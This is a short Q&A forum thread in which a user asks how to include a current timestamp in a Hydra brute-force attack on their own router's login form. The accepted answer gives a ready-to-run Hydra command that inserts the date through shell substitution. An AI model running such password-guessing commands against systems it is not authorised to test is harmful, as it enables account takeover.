# Hydra brute-force login with a timestamp

Tags: http, brute-force, hydra

I am attempting to run a brute-force attack on my router just as a proof of concept and have hit a problem in that the POST request requires a parameter of the current timestamp. Here is my current attempt

```
hydra -l admin -P passwords.txt -V 192.168.0.1 http-post-form "/goform/formLogin:login_n=^USER^&login_pass=^PASS64^&curTime=TIMESTAMP:S=Logout"
```

I want to insert the current timestamp for the parameter curTime, how would I do this?

Comment: Hydra is a pretty simple tool; I doubt it is capable of that. I suggest seeing if you can extend it's functionality to do that, or write a simple script to do what you want.

Answer (score 0, accepted):

It depends on the desired timestamp *format*.
If your format is supposed to look like `2020-07-12 07:52:01` for example, then you could use (assuming that you run your command from some kind of Linux/Unix):

```
hydra -l admin -P passwords.txt -V 192.168.0.1 http-post-form "/goform/formLogin:login_n=^USER^&login_pass=^PASS64^&curTime=$(date '+%Y-%m-%d+%H:%M:%S' | sed s/:/%3A/g):S=Logout"
```

Adjust the date format string to your needs.